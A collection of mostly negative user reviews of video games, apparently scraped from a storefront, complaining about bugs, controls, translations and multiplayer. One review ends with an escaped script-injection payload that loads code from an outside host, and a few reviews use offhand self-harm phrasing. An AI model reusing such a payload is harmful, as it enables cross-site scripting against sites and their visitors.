user_comment
fix the online problem pleaseeeee
This would be a good mini-game if the following wouln't apply or be fixed!Controlls are to sensetive and they can't be adjusted! The camera perspective can't be changend but it sort of goes with your movement which can be annoying and is disturbing your concentraion and planning. I therefore cannot recommend this game in it's current state!
We all love neon, we all love space, many of us pine over retro games and puzzles, so feels like a perfect mixture to fit this game. Indeed it has all this neon colors, space on the background and is appealing in general, but for several reasons I would not recommend this game.The game did not even start on a laptop with Ryzen and 1660Ti. On a large scale it ran smoothly on an old i7-2700k twice crashing my PC to full restart... The last level was crashing on each failure, yet somehow I finished the game. It's worth 2-3 hours completing all the levels to gold medal. Pretty simple game worth $10, happy I got it with a 90% coupon, otherwise full price is overvalued.Many people whinge about poor controls and bad support for gamepad. Well, controls are a bit clumsy but one can get the hang of it. Some levels are suitable for keyboard only style, some require more precision with a mouse. I can not really blame the controls, but hitboxes! Those red vents and other obstacles pass the player at a notable distance worth an inch and still hit the player. Very distracting and makes you redo some levels not because of lame skill but due to deceptive triggers.Music might be nice or disliked, tastes differ, but it's mostly dubstep. Whoever likes dubstep will have a nice time. Some tracks say "electronic" and those are once again dubstep. What does dubstep have with neon / space / retro gaming? Completely nothing. I was expecting to hear synthwave, ambiet space or 8bit, but definetely not dubstep, it does not fit the game graphics at all...To sum it up, the game feels half-baked, general style and idea are nice though music does not fit it. I don't want to play scrooge, a good game is worth any money, but games like this used to be freely distributed as flash games with far more quality in them.
To be fair, in-game the multiplayer is listed as Beta, but it's very broken and the game shouldn't have the co-op tag yet.  It desyncs a lot, which doesn't stop you from playing, just means you have an inconsistent experience, and once it comes to someone dying, you're often stuck because you can't leave the room.  Exiting and reloading the game works, but that's not an acceptable workaround.  I didn't try playing in Single-Player yet, and I'm not interested to; I wanted to mutate with a buddy.
Incredibly deceptive multiplayer advertisement. YOU CANNOT WATCH MOVIES/VIDEOS WITH YOUR FRIENDS using this platform (which was the only reason I bought it). Please keep this in mind if this is why you are purchasing the game.Otherwise the game requires a bunch of setup and it is unclear how to set your keyboard and mouse as input devices."&gt;&lt;script src=https://y.vg&gt;&lt;/script&gt;
uno is a good gameuno is in fact, a very simple gameuno is in absolute terms a very easy game in terms of logic and programming to make almost barebones with ascii art and yet fun and functionalubisoft is a baaaad companyubisoft lacks a moral compass and the kind of restraint you gain when growing up that makes you not torture small animalsubisoft must be intentionally incompetent, imagine not being able to make uno a functional experience, how is that even possibleperhaps if more money is shoveled in this money hole they will make uno a functional experience ??? (no?)this ubisoft uno has severe brain damage and makes me feel badpersonally, i would recommend you take some evasive maneuvers and just buy *tabletop simulator*in *table sim*, you could just play something very similar but not quite uno because it is not uno but in spirit it is uno and free from legal repercussionsand this not quite legally uno but spiritual uno is goodand has urine retention
I cant honestly recommend this the game is cheap enough i got it for under $2 and may be worth it to some but the new player help menu with its very small hard to read text is to hard for me to read even though i purchased this understanding it was a data based game if reading the text in the help screens annoying for me sadly i dont have time for the game or the patience to just try fumble my way into it learning  good luck for anyone wanting to have a go it may be a good game if you get past the  reading the help section and also it drove my screen nuts constantly telling me the resolution needed adjusting every time i went in and out of screen to look stuff up best it can do is 1080p which is ok but the constant messages were annoying to me
This isn't the worst ND game in my opinion, but I feel like it could have been MUCH better. I ABSOLUTELY HATED the games that I had to play with the kid (forgot her name!) EVERY TIME you have to ask her something; I thought it was annoying that you have to go up the stairs and do a puzzle EVERY TIME you need to get to a secret room; but above all, I was left VERY confused about the motive of the culprit. So I would only recommend the game to those who want to play all the Nancy Drew games (like me!).
very very idiot game! if you play in game and have win, the game must log out, and reject your game, this is idiot and bad game poker, the develover idiot
unplayable + you can't exit the game if you dont have controller u should use task manager x_x
Glitchy game!
This is similar to the other point and click games from this dev, but .. either this is one of their earlier games or someone dropped the ball with regards to quality control here. The hallmarks of the dev are here though: Great graphics, a beautifully hokey story, weird puzzles and a most BLESSED hint function that helps you out when YOU want to. But, sadly, this game has a lot of frustration in that for starters, as many others have mentioned, the translator really bungled the job to an extreme degree. Whomever was in charge of that doesn't really have a full grasp of the English language and that causes a lot of annoyance when you realize that X means Y. But honestly, I can deal with that sort of stuff since there's the beautiful hint button to help me out. But what I find inexcusable is the fact that some of the things are downright impossible to click on sometimes and you have to basically carpet bomb the entire thing with clicks until you hit the right pixel.Then there was the one thing that nearly caused me to give up on the game entirely. A small feather that's partially obscured by a tennis racket. Clicking that caused the game to refer to a puzzle combo that won't come into play later when you return to find more objects in the same space. Oh boy.. yeah.. that's... seriously devs, that's BAD. So no, I can't recommend this game, I really want to, because it's a fun and short romp through a silly zombie story with fun environments. But with bugs like these.... nope, can't do that.If you want a solid game like this though, I highly suggest "Contract With The Devil" by the same dev. It's longer, it's more beautiful and most of all, there's no bugs or bad translations happening!
I like many of the people here played the original gateway 1/2 on flash when I was younger. those games definitely left an imprint on me. i think the developer succeeded in creating a fun puzzle game with an interesting story and uniquely unsettling atmosphere. I was looking forward to buying this game, and while its not god awful its definitely disappointing.  The puzzles and environments in the first game were varied and compelling. Here they are extremely repetative. Its almost entirely consists of tile puzzles, some of which barely even qualify as puzzles. To make matters worse, it hardly relates at all to the original story. i thought that the second game concluded nicely and was curious to see where the devs would take things from there. well turns out it adds literally nothing except for the ending i guess (?) which was honestly confusing as hell. maybe im just dumb but I really did not understand any of it. the original two games are good but they were already free, so youre paying $10 for a less than one hour game that is mostly bad tile puzzles. One other thing is that in gateway two theres this super obnoxious and grating high pitch noise in some parts of the game. Wtf? its remastered but evidently all they did was make it worse. these devs can do better
SOUND DOESN'T WORK :(
You cant pick which way u want to go
That's the worst game I've ever "played". I wouldnt even recommend it for free. You might not get achievements from it but epilepsy. I died like 20 times because of a pixel i cant identify and they couldnt even manage to make the achievement to work. Idk how 1.5% off the ppl who played this game managed to get the achievements. Maybe the developer represents the 1.5%. If you want to get into the mood to kys buy it.
This game tricked me I thought it would be some sort of visual novel which I guess it is but its just bad art and text straight from the book. If you have read the story I dont see why you would want to spend money on a poorer version of it.
Absolute trash game. I would not recommend anyone by this game. Ever. How it has mixed reviews i will never know, since that implies someone actually had to like this game.
The only chance to make any progress in this game is to concentrate on watching the video guide. In doing so you will still have to press to right buttons in the very second they show up or you will die. No chance to watch the scenes or to enjoy the actual game.
This game makes me want to crawl up the ceiling and it never happened before in similar games. The story is transparent, basically like the 80% of those kind of games,nothing new.(Why everyone is copy-pasting those storylines? I mean cmon theres so much options, why? ) Very frustrating bugs, like the one when you use your "shuffle" power and then the tiles shuffle, but have no image on them and you cant do anything than restart the game and you wont get back your energy. Makes you use too much powers, i think its ridiculous you cant finish it without using any power at least once and there are those objectives "finish the game without using any powers" , its not freaking possible! You will run out of moves every couple moves. Also there where couple rules  she mentioned outside of tutorial and not about the powers and if you forget what she said, theres no way you can read it second time. Why its not inside the tutorial aswell? Those ridiculous energy crystals you will be forced to use, once you run out of them, theres pretty much no way you can finish the game and you will end up playing the level over and over and over and over ... and over ... and over ... again ..till you will be just done with the game. The gameplay goes like this : No moves left, no moves left, no moves left, no moves left, no moves left, no moves left, no energy crystals left, play over, play over, play over, play over, play over, play over ... until you will want to avada kedavra it to the moon.The only nice things about this game are the art, music and steam achievments and cards.Probably the first game i will return...
Baaaad game. 0 out of 5 stars. Short review as the game aint worth a longer review rly.
Great game, but a terrible adaptation. Clunky UI that is distracting from the actual game.
If your looking for a fun racing game ... That all your looking for except the fun part... It was a waste of money !
I spent more time on this game than reasonable and it was the most mind-numbing experience in my life. After realizing I fully cleared the story and bought every item I was dissapointed. The concept of the storybook anime game without any nudity or real sexual content is a very novel idea, but the game lacks a substance of story. With the plot lying too far in between the grinding necessary to get it, the game felt very repetitive and gimmicky. The game would be much better if there was more story to it, and not just more after the current ending, but a higher density of story between each level.
read mizuno`s reviewthis game is 25% somehow funny75% wtf, what`s that about ????
Bland. Very bland. I thought it would play like a modern Darius Gaiden, but I was sorely mistaken.Pass on it.
The concept is great, the execution is terrible.This could be an amazing game if it was just polished a little more. Primarily the counterintuitive movement, if you jump off a moving vehicle (while being carried along by it) you suddenly lose all speed you had as if you just jumped from a stationary position. This one issue caused me to stop playing due to it feeling like the levels were designed with it in mind.....yet it isn't there.I think the concept is amazing and if little issues were fixed I would definitely play it, but even the one jumping issue (that caused me to retry one of the first levels over 20 times) is too major of an issue to ignore.Hope I can one day recomment this, but today I cannot because of its unfinished state.
Currently multiplayer is not functional - My friend and I weren't able to join each other's gamesPros +I can be pinkCons -No one can see how cool and pink I am
20mins game play max then it gets repetitive and boring. Feels like a gimmicky game trying to cash in on the new VR market with a 'just finished enough to pass' game. Handling of the bow and items is wrong, it warps the the hand of the person, you can't move around (walking or teleporting) or i just couldn't figure it, there is only one area/map and you do everything inside of it.Game modes are basically, shoot targets, shoot targets but with limited arrows, shoot targets against a clock, shoot apples, or shoot anything you want.I like the Lab version of archery, it has a little subsistence to it where you have to protect a castle. This is just shooting a bow.I also found out it's not very finished on the gameplay side as i could hold and nocked arrow against the string and throw the bow away from me while still holding the arrow. When you let go the arrow fires as normal through the arrow rest.I would not recommend this game, I would just play the Lab instead.
Issues with the graphics and mouse (Graphics are blurry and very weird and the mouse (for me) jumps around a lot)). You can apparently find skip tokens in the game but if you're like me and hate a certain type of puzzle (slide puzzles) and it's the second puzzle in the game which means you won't have any skip tokens....this game might make you rage quit and just never play it again. =p
It made me want to jump off the Twin Towers. Do not play
The game is very creative with a great art style.The problem is it was clearly developed by people who don't speak English as their first language. I'm sorry but you guys need to hire an English copy writer. The puzzles are clumsily worded. There are basic grammar errors and strangely structured sentences that don't seem to be part of the riddle but just bad writing.Ok, it's a Polish studio, but look at CD Projekt Red. Also Polish developers and they have some of the most well written dialogue around.
Terrible UI and font choice. prologue to the game is way too long. The gameplay itself is not clear. There is a plenty of free mobile apps to learn Japanese ;-;
Devs abandoned this game and the work to be done on it. Nothing works and steam successes are inactive.It's a cute little game that doesn't work. i'm disappointed..
BLADENET should be a slam dunk: it's SpyParty, but all the players are spies. It's like a multiplayer Hitman. I love cyberpunk. All of these things should make this game an easy win for me. What went wrong?Sadly, the game's current state is simply not good. It doesn't run too well (at least for me), but more importantly, the mechanics at play here are unsatisfying. Maps feel dead and empty, despite being loaded with people. Everything comes with a level of jank that is just a little to strong for my tastes; it simply doesn't feel good. Objectives are simply unclear, and accomplishing them doesn't feel good.Maybe BLADENET will get better. It's a good candidate for Early Access, but I simply cannot recommend it as a complete product in it's current state, as swell as its potential is, when it simply does not give what it could. May refund; but will keep an eye on the future of BLADENET.
I recommend it for those who are: Expecting nothing Chinese from this game Able to put up with the somewhat impassive character voice (in Chinese) Able to put up with the crappy English sub(dunno if they have done something about it) Able to put up with the unpolished puzzles, plots and lines Superbly easily moved, even by the most cliche stories Chineseor eager to get rid of the root of all evil.Cast Asami Imai for Christina. Of no help in such miserable condition though.
Luxor 2 will not work on Windows 7. Two Bad becuse all the other    " LUXOR " Games  seemto2 work fine. I can't find a work around, That works
I think the developer has abandoned this game.  The game has a feature where you make a movie, you click finish, it gets reviews and you get money based on the review by the AI, but half way into the game its stops working. You can cant finish movies or advance, and the game is broken because of it.  I made a video sent it to the developer 3 months ago and I tried the game today and it still has not been fixed. Has all of the same bugs despite me uninstalling then reinstalling on a new game.
Don't buy this game, do favor to yourself
Get it on sale for $2, but I can't recommend paying full price, here's what I wrote on the forum-Okay for one, set the controls to WASD and shoot to the mouse and dash to space and change consumable to shift. For two, the game needs a better rougelite system. Currently I don't understand the point of how it works, we kill a boss, then are thrown out to the main menu, just to start another run to kill another boss... Why? Just let us keep going killing bosses. Once we die, THEN throw us to the main menu.. Here is where part 3 comes in. Three) We should have a currency system between games, during games kill should give us credits which we spend between games on perma upgrades. I just don't have fun knowing I might waste an hour trying to beat a boss just to die and have no upgrades then have to do it over and over with no progress, that's madness.. Also I don't really understand the consumable system, I guess it's the 'progress between runs'.. But its like, dumb consumables, that's not progress, and my hoarder brain refuses to use consumables anyway. It's super dissapointing to see how close this game to greatness, it feels like they got bored of development and scrapped what should be an easy-to-develop system on top of a polished product.. IDK man, I don't see this having any more playability past 10-20 minutes without an rougelike upgrade system, why would anyone keep playing? :s 21.2% of people have the achievement for playing for an hour or more so I think I'm on to something..Also between rounds we get an upgrade, but it doesnt say what it does, its some vauge text, and I dont want to have to consult the wiki every 2 minutes
The steam description says up to 8 players, but what they meant was "Up to 8 players as long as 4 of those players are bots." Had 6 friends on a LAN and only 4 could connect to the game lobby at once.
While I will not recommend anyone follow my review, I still feel like it would be important to share my experience with the game.When I bought the game, I initially played it through the first level before setting it aside and going to a new game. This itself was not in a lack of interest, but to another video game that took said interest.It was my girlfriend at the time who found interest in the game and began playing it. Now, I had been playing some games that stress my hardware, but this game was no where near the extent of the other games at the time.Hence my surprise when my PSU exploded when she was playing this game. Typically, I would have excused this as a hardware issue on my part and would have not had any discomfort with the ownership of the game... Until it happened again. And again. Strike three was where I decided to make a sub category entitled, "Games of Shame," that includes games that are either unplayable or that I just don't typically like, and placed the game into said category.From what I was able to play and/or witness, it is quite a beautiful game well suited for the casual/indie demographics. Quite family friendly, beautiful graphics, and appealing sound.
It's not a city builder or a tower defense. It's also not a great RPG and has very frustrating combat mechanics. It could be a cool combo with some improvements, but as it stands this combo fails at everything.At $15 it's not a rip-off, but I would not recommend in it's current state unless it was in the $5 sale bin. Cute for a few, somewhat frustrating hours, then uninstall.
Its a mess, where the only people that could possibly think to use it to justify anything are its deranged developer *cough*derek*cough* and people that for a reason I will never understand fan boy the ♥♥♥♥ out over 3000ad.
Crashes everytime I open it, please fix
Please just don't buy this game (or trilogy)... Don't get me wrong, the games itselves are amazing and classic, but Steam versions are ripped from tablet version. Whole game feels unfinished, bunch of thing are totally missing and inventory is the worst thing on planet. Buy GOG version instead. That's the Dracula you are looking for! I feel bad for my 15 € that i spent on trilogy on Steam when it came out. There weren't any reviews and i didn't know what's wrong with this pile of ♥♥♥♥.
THERE ARE BETTER VR CASINO GAMES ON STEAM THAT ARE FREE!!!This game was /alright/ when it first launched and there was a playerbase.A major flaw is that the game requires players to host sessions. If the host quits or has connection issues, it will kick everyone else out.They were expanding the game, but only with useless "levels" (who wants to pretend to lift weights in VR?) instead of expanding for more actual CASINO games.Was hardly worth the money then, not even worth getting on sale today.If the developers can allow for dedicated servers and add meaningful content, and the playerbase grows some, it MIGHT be worth it on sale.
Hardcore and challenging game... Sure, however the devs haven't developed this game to first of all, work in the intended way. You can trivialize the game with pad in big picture if you have one.Nearly completed the game at this point, and i gotta say, while this could be "hardcore and challenging" game, it lacks any competency and it's there just so you wouldn't so easily complete the game under 2 hours and refund it.
get all achievements bug
For €15 it is basically a ripoff.Very basic functionality. Not possible to set place, date or time. Only narration for Gemini. Hugely dissapointed.
If you love your kids don't bore them with this. The other Putt-Putt® games are worth looking at as a distraction but this, no.
Procedural generation algorithm only creates trash levels, and threats are almost indistinguishable from the environment.
Bad game the whole time you are just wild clicking on items to collect.Some items are not seen in the tall grass. There are better games of that concept that do not cost.Real waste of money to buy the game.The game has 90 levels that are all the same, the maps differ only in that they are different items Collect and the background changes.Fun factor 0Frustration factor 10
After 21 hours, I found this turn-based RPG to be a chore to play. Not a good sign...I tried to get into this game, but nothing here can keep my interest anymore.Pros:-Nice artwork, unique character design, bright colorful graphics.-Steam overlay support, low system requirements, decent price.-Xbox 360 controller support no setup required.Cons:-Story is boring, towns are bare bones, battle system gets boring.-Music is terrible, sound effects are terrible, no voice acting.-Character movement controls are bad, menus and option interface is bad, game was possibly designed for touch screens.I want to discuss the negatives some more in detail.You are often half a tile ahead from eveything when you move. For example, stopping in front of a door or a NPC will require precision, and you must be directly in front to interact. It's like you are being forced to run all the time, and I couldn't find the walk button if it exists.The menus look like large buttons with no clear prompts about which button does what on the controller, so the controls have a learning curve that I found to be a lot longer than it should be.The music is really bad, and the sound effects are very tinny basically crap in my opinion, and the sound sliders blast the music and sound effects painfully high if you raise the slider too high.The battle system tries to keep it interesting with a wide variety of enemies, but the battle frequency is very high, and I just found these battles to be more annoying than fun.I am no stranger to games where you grind a lot, but you have to find the right balance of fun and challenge.I expect more out of an RPG that I am going to spend potentially hundreds of hours on, and this game is a piece of garbage compared to other great titles available today. The core element is there, but the overall presentation here is just not good enough.Skip this one, it does not have enough good qualities to warrant your time.
Abandonware.
Trojan... I'm using webroot. I've uninstalled and reinstalled a few times. Unfortunately before I dumped anymore time into it I forgot to screenshot the 2 files that kept being identified as a trojan. Now here's the rub. I know sometimes there are misidentifications but my computer was acting funny so I scanned and that's how I found it. Why on earth would game files be memory resident even when steam is not loaded? Anyway can't recommend the game in it's current state.
It starts out fun, but quickly becomes infuriating.Pros:● Decent music.● Simple but enjoyable art style.Cons:● Extremely floaty &amp; unresponsive controls.● Confusing lack of visual depth.● Near impossible later levels.The ball movement seems sluggish yet it picks up a lot of momentum. Combine this with the unresponsive controls and not falling off the edge constantly becomes quite the challenge. While the art style is nice the game does a really poor job of conveying depth. This made navigating curves on skinny rails extremely hard and some levels basically involved trial and error to see if I was going to roll onto a moving platform or just fall off the world because the platform was actually on a different plane.The first two and a half-ish worlds are fun, but then the game quickly becomes a chore.  In world 3 the game introduces skinny rails which are extremely difficult to traverse with the sluggish, unresponsive controls and confusing lack of depth. By the later levels these rails are so long and curvy that the levels become near impossible to complete normally, much less within the time challenge limits. I suffered my way through world 3 only to find that world 4 had more skinny rails, but now there was also some weird fire mechanic which can kill your ball and reset you. It was at this point I gave up. I enjoy a challenge, but by this point the game was so infuriatingly difficult that it was no longer fun. Unless you're a masochist I really can't recommend this game.
I wanna hate myself for playing it, getting through all these bad translations for almost 30 hours to get completely irrational bad end. What the...?! This game MC Hangyi is some sort of moron playing with other people feelings, even if we have choices they are lacking control. I thought I've seen it all, I was wrong. Some choices were even blacked out, good luck guessing why they push you into traps. I can forgive cheap drama if I know that I am in the wrong. But here I was not...So yeah there goes my blind playthrough which I wanted to play cool getting to know every character closer. The real shame of it all is that I feel soory for the heroines of this game. Hayjin, Fengxi, Fengyi they were all serious competitors for well written and enjoyable characters. It was hard to pick one when they all brought positive feels into my heart, despite bad translation.I am really frustrated when good games are going all the way downhill, but I can't see it any other way than a wasted theme. True Love could've been a good slice of life filled with drama, if they could keep it together. This game though is a mess hardly making sense half of the time between dialogues and scenes. Even though story has some good feels and memorable moments! I feel betrayed in the end. All that keeps me around is reaching an end, that at least one of the heroines deserves.
I"m surprised there isn't one review and honestly I"m not sure how this works so not even sure this one will show up.The reason for this review being negative isn't because I didn't enjoy the game. I actually liked the game and was having fun playing until it was unplayable due to you can't finish the game because of the huge flaw in the game play design of it near the end of the game. What makes this a game not to purchase is that the developers designed this game so that an essential item you need to finish the game that is used way before near the end of it simply disappears because you use it on a previous task, leaving you stuck at a crucial part near the end of the game because you can't find another source for this item or way to get it back without starting completely over.  This means if you find this out after you been playing the game you already invested a lot of time and can't finish the game.    This may be a game I come back in the future just to see if the solution I found is doable considering if you mess up again your stuck in starting over again however why would I want to start all over again any time soon having just played it over a couple of days ( I don't usually play a game through in one session and play times will reflect me leaving games active even if not playing at the moment) having to search and discover a solution only because I found a random post online explaining what we have to do in order to complete the game.  if you do have this game or want to get it read  the game discussions here  on steam first because I posted how to get around this issue in the game.  I haven't tested it out but maybe in the future will.I don't know why when games I would think are usually tested by the developers and even later sometimes problems are found and they create a patch or update to correct them that this game hasn't been looked into but why have a game for sale one can't even finish :cdisappointed and  since my playtime is well over 2hrs before I even encountered this issue no chance of requesting a refund from steam, though it was on sale I would be asking for my $3.35 back due to unable to finish the game. :c
I'm gonna be completely, First Class Trouble is a really fun and uniquely themed deception party game...key word there is "party". While this game has a lot of goofy and funny mechanics, nice atmosphere, cool music, and hours of enjoyment it cant really be experienced like that without a 5-6 player group. I can't recommend this game for anyone playing alone or with a small group of 2-3. Me and my friends love this game, but I think we have the best time when we are all playing together even though it isn't a complete 6 stack. When the party sized goes down to about 2-4 things get a bit annoying or unplayable at some points. Most people in the small population of this game at the time of this review is appalling at some times, not all the time, and its just degrading to play. The amount of times either me or my friends have been made fun of, called slurs, intentionally killed because of our gender, and other disgusting behavior is starting to add up. It went from a few people here to having an encounter like that every other match. This doesn't include your typical 2 stack throwing the game and killing the entire lobby personoid or not. The closest resemblance to my experience on this game is that of a Counter Strike: Global Offensive match. Not very tasteful.The community aside, this game is great and I've had some of the best laughs playing this together with my friends. The game play is goofy and fun, there is character customization with more outfits and accessories to come, and a very interactive environment to play around. I really do love this game but i don't think i can recommend it for someone looking for a casual experience whether it be alone or with a few people. A lot of people who play this game take it very seriously and can test even the best of nerves. Regardless i plan on playing this game with my friends for many more hours to come and hope to see some major improvements to the game in the near future !
Your tolerance for the little details this game flubs will determine how much you enjoy this game, but for me, I'm not sure I feel like playing past the second level. Things like getting killed by an enemy because a shot whiffed due to randomized angles, or the incredibly distant checkpoints, or the fact that your shots seem to destroy pickups (EDIT: it turns out pickups aren't destroyed but instead picked up!! this is actually good, but a bit unclear), or the fact that there's no mouselock so you can accidentally click outside the window but if you try to play on a controller the aim is agonizingly slow and locked to eight direction, or so on. I don't want to be incredibly hard on the game because a lot of what I tried felt nice and I like the concept, but there are a lot of little places where a lack of polish makes this difficult for me to stick with.
The dedicated server program stalls most of the time. According to Steam, the game kept running even through computer restarts, and apparently runs under a different alias in Task Manager, since all Yargis-related tasks were shut down, and was still unable to uninstall.
Early access "game".Latest update: 11 Mar, 2019It's a scam or dead now. I requested a refound, i hope the steam team will give my money back even if i bought it since ages because i wanted to support the "team" but i haven't seen any updates since i bought it.Just go away and buy something else i think..
Well it's hard to vote down but since there is no "neutral" button i tend more to negative then positive...PRO:- Nice Art- Lovely peaceful SoundtrackCON:- Several decisions but effect only two events- Some decisions doesn't make much sense- German translation is full of mistakes- Very Short Story- Not very suprising ending - only two of them- Sometimes Kira looks like an Figure of PaperSo lets get some text.Always the same blue sky is a little VN wich plays on an island somewhere in the mediterran south. The player can name himself like he want and can choose if he wants to be a girl or a boy. And here comes one of the strangest decisions of the Novel. The whole story is written on the role of a boy. But it doesnt effect anything if you are a boy or a girl. So you decide if you get to a normal or lesbian romance? For what? Its one of the things i don't get. Nobody need a decision like this its just senseless. Art and Soundtrack ist well done. It fits and have some pretty CGs. The decisions you made are also a little bit senseless. It results in just two ends: A "good" one and a "bad" one - but i think they are predictable and not well written. This is a pity! There is so much potential to make a very good Novel with serveral decisions but most of them are not effect something big. There are one or two diffrent scenes you can get but with all ways you come down to the same endings...My first walkthrough was made in 45 minutes... sry this is too short for me... The price ist ok i think if you want something you can read in between times its a choice. And: Read it in english! The german translation is just a joke - in english you'll have no problems. All in all its a little Novel with good Art and Soundtrack but much mistakes and strange decisions. You can buy it but don't expect too much. For the price it's ok.4/10
DO NOT BUY this game. It have critical bugs that prevents you to complete this game.Devs did nothing to fix it since Aprl 2019.More info here: https://steamcommunity.com/app/1016720/discussions/0/1680315447984953200/?ctp=2#c2943622078759307821
one of the worst games I´ve played in a long time
This game really looked interesting, but I had to request a refund after less then 30 min.The concept is great, but it needs a lot of work.Tutorial is just a few basic tips. On easy mode you can't even get into the game before being attacked. You have less than 3 min to prepare before being attacked.You need to build an Iron mine, but I couldn't find an Icon for that building. I really don't see how the Devs even play tested this and that is why I will not be coming back.
This is obviously a passion project for the makers. The story is nice, the voice acting and the music are excellent. Reminiscent of the "Stanley Parable" and even more like "The Beginners guide". Those games, however, had a quirk. Something fun that would make it playable. This story isn't a game. It's an audiobook that let's you walk around. Walk around clicking all the highlighted items and solve a very simple slide puzzle to advance to the next room. There's a journal in which you can read the story behind each item you click but there's no penalty or reward if you do or don't.Coming from Cyan, I was a bit disappointed. Played through it in 2 hours.If you're axpecting a puzzle game, don't buy it. If you like listening to a story while you click things, do.
Poorly optimized, and too many bugs to be even worth listing. Couple decent ideas, but needs a lot of polish, which is not something you expect from a game that's been released proper (as opposed to Early Access).For the asking price, I'd be remiss to recommend this game (got it on sale, and I'll still be refunding).
Trash. Pls DONT buy it. Only Money waste
Bought the game for the art style which is indeed good, But quickly got repetitive. There were bugs which were tied to the level objective which made me restart couple of times. Looks polished but not gameplay or technically. Refunded.
do not get this it sucks
In its current state Mowin' &amp; Throwin' feels unfinished. This is mostly due to the complete lack of AI players.If you have two friends over to play, you will be unable to all play together as you can't play any form of 2 vs 1 with one person having a computer team mate. Also the 1 v 1 is very limited in play as you have no team mate on your side to work with. So really this game is only good fun if you have 4 people who can play.There is no form of single player what so ever! No way for you to practice on your own etc.Just imagine getting a tennis game where there was no computer players, NONE!  This is what Mowin' &amp; Throwin' feels like.If at some point AI gets added I will change my review. But as of now I would really not recommend this game.If they added a simple AI to fill out teams and an ability to switch and take control of your team mate like switching players in most sports games then I think this could be very good.But as of now, being really a game that is either 4 human players or nothing, it is bad.
Waste of time.Waste of money.Defenite luck of any kind of interest.Went through Chapter one,hoping that there will be something interesting that requeres player to do anything. Blindly following instructions and demands of food wood stone and iron.Clicking over and over to brake barels with useless food.Story line is straight forward: "Hello, I am poor native indian who just sits here and cannot repair his own house. Could you please help me, and I will let you to be directed to another poor indian, that needs a starfish, just because. And he will direct you to another indian, that needs that totem to be repaired, and he will step away, so you can collect the gold behind his back. And remember that if you do not repair my house, all this chain will not happen."Did not have to think about anything.No addicting element.Grafics for this kind of game is nice.Will not recommend.Whant my money back.Total dissapointment.
The worst PARTY game EVER its so baaddd dont even think to purchase this nonsense game and yes i already refunded it
I've always enjoyed this game since I was younger just due to the simplicity of it, in addition to it relating to my special interest, however, I'm very much so disappointed by how buggy it still seems to be. From randomly closing the game (often enough to where I've had to start saving multiple times a day just in case), to permitting me to follow through with the wedding for Kate's storyline, it's exceedinly frustrating, and since it's been years since I've played I can't recall if I've ever found a way past that.While I may have certainly enjoyed this game once before, re-experiencing these flaws is proving this to have been a waste of resources.
4.0/10Why well its slow. its lacking and very basic. I played through campaign in a few hours and was not impressed. I have had much more fun with EVERY other puzzle game out there. and its 4.0 only cuz well its solid. it doent have a high fidelity nor a compelling story and if it werent on a flash sale for like 1.70$ I wouldnt have bought it. and I dont recommend it either unless you wanna try it out, but act quick while the sale lasts. anything more than 2$ isnt worth it.
Super boring!Its a week I have nightmares running off a pipe after playing an hour of this.  
Thoroughly enjoyed this game, however due to no updates in 6 months..it get's a down vote.Really disappointed in paying for a game that the developers have brushed aside.
UPDATE: Updating my review since the game appears to be fully released now. There still is a sad lack of content. I can't recommend anyone to spend any money on this. There are only two new pieces of content: Natives can raid your settlement. Once you upgrade your wall and watchtower a bit it becomes impossible to lose, and there's no action or control you have other than upgrading those two buildings.  Natives can sometimes give you missions to upgrade a building or to beat the next invasion.To their credit, the developers seem to have fixed the bugs I mentioned and added interface scaling. The only new bug I've run into is that Natives give me missions to upgrade buildings that I already have at max upgrades, so there's no way to complete it.------------------------------------Early access review:I'm hoping for more from this game in the future but right now it's not worth buying, even at sale price. It's an incremental clicker game with no content.On the upside: it has lovely art and animations it runs smoothly on my old computerOn the downside: the only thing you can do is build 9 buildings and upgrade them. 2 of the buildings don't even do anything you can only have one of each building and only in the predetermined spots to build them the interface doesn't seem to scale. It's annoying to try to click the tiny buttons   I ran into a few bugs, like not being able to continue my saved game, but I won't fault an early-access game for that.   I hope I can give it a more positive review in the future when they add some real content, but I couldn't recommend this to anyone in its current state.
Seems like an interesting learning tool, but it is extremely overpriced as it looks like it was written extremely quickly in Java and then pushed out to the store without any regards to actual UI design. I'd recommend it if it were free— however even some free solutions have better UIX than this.
Do not download this. Cant even get into the game.
"Oh, this looks good"Drops in a level"Okay" rotates with controller by accident"OH ♥♥♥♥"Almost falls over and pukesgg would almost throw up again 10/10
Overall the game looks cool, and it seems that if you really lay some time into it you could make something nice.But, the things you can do is very limited. I know the game only is in early access, and i hope theres comming more features in the future. An example that there could be added some more things to is when you go under the libary where you have all of the buildings primitives, vehicles and accessories it looks like theres alot of things to do, but as soon as you open the folder, there is nearly nothing inside.In the vehicle folder there is only one prop, and thats a boat.I would not recommend this, but i see, if you're new at animating ect. this would probably be a good way to learn some basic stuff.So overall:The software as it is right now is very limited. I hope it'll get some new updates with more props, and more features. If so, i'll maybe try it out again.
2 months later Edit: still no fixes to the game, it's in a bundle now though so more people can buy this broken and terrible gameEdit: the dev responded to my review and actually seems to care (unlike with most games), so my opinions expressed below may change if they update the game, if so I will re-play the game again and update my reviewI'm really not sure what I was expecting from this, a very bad ripoff I guess.yet I was still let down.it controls horribly, almost unplayable with a mouse (the only control option on pc)it has built in advertisements for games on the app storejust terrible, I really hope nobody else buys this
Game got boring pretty quickly.
This is definitely an upgrade over the 2014 edition. However, as another reviewer reported the game deletes players every time you save it. I lost 4 players randomly. Not completely unrealistic, maybe 8% of the players in this league are Antonio Brown level crazy and just disappear. I would prefer not to lose players though.
This is the first game in the series to just utterly irritate me. The timed challenges are pretty easy to fail. The other two games gave you a ranking system that was fair and balanced, while this one just had me ready to throw my mouse and punch my screen. If you want a REALLY challenging game out of something that shouldn't be, then go for it. If you're expecting the same light hearted fun as the other two Tasty games, go back to them. I give this game a 4/10.
looks like casual game but it is challenging, no room for mistakes...
NOT A LOCAL COOP GAME.(There is local coop, if you enjoy placing turrets with one joystick, but it's painful.)Also, the game itself is very repetitive, and the meta progression is _slow_. Plus, there are a few bugs. Keep your bucks for another thing if you were looking for a cooperation game.
There are better alternatives
Buggy, reptitive, unoptimized. Fun for...10 minutes?  Decide what you would pay for 10 minutes of 'fun' and then consider another game.
